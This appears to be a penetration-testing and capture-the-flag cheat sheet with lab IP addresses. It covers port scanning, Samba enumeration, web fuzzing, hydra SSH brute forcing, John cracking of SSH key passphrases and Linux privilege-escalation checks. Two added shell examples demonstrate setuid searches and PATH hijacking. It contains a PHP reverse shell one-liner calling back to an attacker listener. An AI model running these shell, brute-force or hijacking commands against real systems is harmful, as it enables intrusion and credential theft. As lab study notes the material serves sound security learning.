Scan for open ports (-A enables OS detection, version detection, the default NSE scripts and traceroute; note that without a port specification nmap only checks the 1000 most common TCP ports)
nmap -A 10.10.116.134
Get information about Samba (-a runs all simple enumeration: users, shares, groups, password policy, OS info)
enum4linux -a 10.10.116.134
Connect to the anonymous Samba share (press Enter at the password prompt for a null session)
smbclient //10.10.116.134/Anonymous
Seclists: https://github.com/danielmiessler/SecLists
CeWL is a Ruby app which spiders a given URL to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper.
Directory and parameter brute-forcing: FUZZ marks the point where each wordlist entry is inserted. If FUZZ appears twice in one request (as in the POST below) the same word fills both fields. With wfuzz, hide uninteresting responses with --hc (status code), --hl (lines) or --hw (words), e.g. --hc 404.
gobuster dir -u http://10.10.154.87:3333 -w /home/kali/Downloads/big.txt
wfuzz -c -z file,wordlist.txt -u http://10.10.218.20/api/site-log.php?date=FUZZ
wfuzz -c -z file,big.txt -d "username=FUZZ&password=FUZZ" -u http://shibes.xyz/api.php
wfuzz -c -z file,big.txt -u http://shibes.xyz/api.php?breed=FUZZ
./ffuf -u http://s3.bucket.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
dirb http://10.10.144.50 big.txt
SSH brute force with hydra (-l single username, -P password list, -t 4 parallel tasks, -f stop after the first valid login, -V print every attempt)
hydra -t 4 -V -f -l jan -P /home/kali/Downloads/rockyou.txt 10.10.116.134 ssh
Crack an SSH private key: convert id_rsa into John's hash format, then crack the passphrase with a wordlist
python3 /usr/share/john/ssh2john.py id_rsa > idcrack
john --wordlist=rockyou.txt idcrack
Search Exploit-DB for WordPress exploits
searchsploit wordpress
PHP reverse shell one-liner: connects back to the attacker's listener (here 10.9.231.55:4444); the socket becomes file descriptor 3, so the shell's stdin, stdout and stderr are all redirected to it
<?php $sock=fsockopen("10.9.231.55",4444);exec("/bin/sh -i <&3 >&3 2>&3"); ?>
Listener on the attacking machine
nc -nvlp <port>
Upgrading the netcat shell to a fully interactive TTY (spawn a pty with Python, then put the local terminal into raw mode with stty so Ctrl-C, tab completion and editors work)
LinPEAS is a script that searches for possible paths to escalate privileges on Linux/Unix* hosts
List sudo rights
sudo -l
Binaries with the setuid bit (run with the owner's privileges, so root-owned ones are privesc candidates; -perm -4000 matches the setuid bit, -user root limits the search to root-owned files, errors from unreadable directories are discarded)
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
Shell history files (often contain passwords typed on the command line): ~/.bash_history, ~/.zsh_history
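The same setuid search as a reusable function, as an added example that is not part of the original notes. It takes the start directory and owner as parameters so it can be run against a scratch tree without root; the fixture files, the owner default and the function names are my own assumptions, not something the notes describe.

```shell
#!/bin/sh
# Added example (not from the original notes): list setuid files under a
# directory tree, optionally restricted to one owner. Same find(1) logic as
# the one-liner in the notes, parameterised for testing.

find_suid() {
    # $1: directory to search (default /), $2: owner name or uid (default root)
    dir="${1:-/}"
    owner="${2:-root}"
    # -perm -4000: the setuid bit is set, whatever the other mode bits are
    # -type f:     skip directories, where bit 04000 grants no privilege
    # 2>/dev/null: hide "Permission denied" noise from unreadable directories
    find "$dir" -user "$owner" -type f -perm -4000 2>/dev/null
}

# Print the matches in long format so owner and mode are visible at a glance
show_suid() {
    find_suid "$@" | while IFS= read -r f; do
        ls -ld "$f"
    done
}

# Build a constructed scratch tree with one setuid file and one ordinary file
# (assumed fixture, so the helper can be exercised without touching the real
# filesystem). Prints the directory path.
make_fixture() {
    tmp="$(mktemp -d)"
    mkdir -p "$tmp/bin"
    printf '#!/bin/sh\necho hello\n' > "$tmp/bin/suid-demo"
    printf '#!/bin/sh\necho plain\n' > "$tmp/bin/plain-demo"
    chmod 4755 "$tmp/bin/suid-demo"    # setuid bit on
    chmod 0755 "$tmp/bin/plain-demo"   # ordinary executable
    printf '%s\n' "$tmp"
}

# Usage on a real host: show_suid / root
```

On a real target run show_suid with the default arguments; on a box where you already own a different user, pass that user's name to spot setuid files belonging to them.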
Local web server serving the current directory (e.g. to transfer tools to the target)
python3 -m http.server 8080
Filter a file through grep and write the results to a file
grep -e "dir" <file> > result.txt
View & edit the PATH variable (directories are searched left to right, so a directory prepended here wins for every command that is called by bare name rather than absolute path)
https://www.baeldung.com/linux/path-variable
echo $PATH
export PATH=/some/new/path:$PATH
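What prepending to PATH actually changes, shown end to end as an added example that is not part of the original notes. It builds a constructed "victim" script that calls id by bare name, plants a fake id in a directory we control, and runs the victim with that directory first in PATH; a second victim that uses the absolute path is unaffected. The script names, the fixture directory and the choice of id as the hijacked command are my own assumptions.

```shell
#!/bin/sh
# Added example (not from the original notes): demonstrate command
# resolution through PATH. A program that invokes "id" by bare name picks
# up whichever "id" appears first in PATH; one that uses the absolute path
# does not. Everything here lives in a constructed scratch directory.

# Create the fixture: a weak victim, a hardened victim and a fake "id".
make_fixture() {
    tmp="$(mktemp -d)"
    mkdir -p "$tmp/victim" "$tmp/evil"
    real_id="$(command -v id)"   # absolute path of the real id binary
    # Weak pattern: relies on PATH lookup
    printf '#!/bin/sh\nid -un\n' > "$tmp/victim/report.sh"
    # Hardened pattern: absolute path, immune to PATH changes
    printf '#!/bin/sh\n%s -un\n' "$real_id" > "$tmp/victim/report-fixed.sh"
    # Attacker-controlled replacement that shadows the real command
    printf '#!/bin/sh\necho HIJACKED\n' > "$tmp/evil/id"
    chmod 755 "$tmp/victim/report.sh" "$tmp/victim/report-fixed.sh" "$tmp/evil/id"
    printf '%s\n' "$tmp"
}

# Run a script with a directory prepended to PATH. The export happens in a
# subshell so the caller's own PATH is left untouched.
run_with_path() {
    # $1: directory to put first in PATH, $2: script to run
    ( export PATH="$1:$PATH"; sh "$2" )
}

# Usage:
#   fx="$(make_fixture)"
#   run_with_path "$fx/evil" "$fx/victim/report.sh"        # prints HIJACKED
#   run_with_path "$fx/evil" "$fx/victim/report-fixed.sh"  # prints your user
```

This is the reason sudo resets PATH to its secure_path and why setuid programs must not call helpers by bare name: whoever controls the first directory in PATH controls what runs.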
CyberChef - encoding, crypto and other string operations
exiftool - show EXIF and other metadata of a file
Extract hidden data from images (steghide prompts for the passphrase)
steghide extract -sf Image.jpg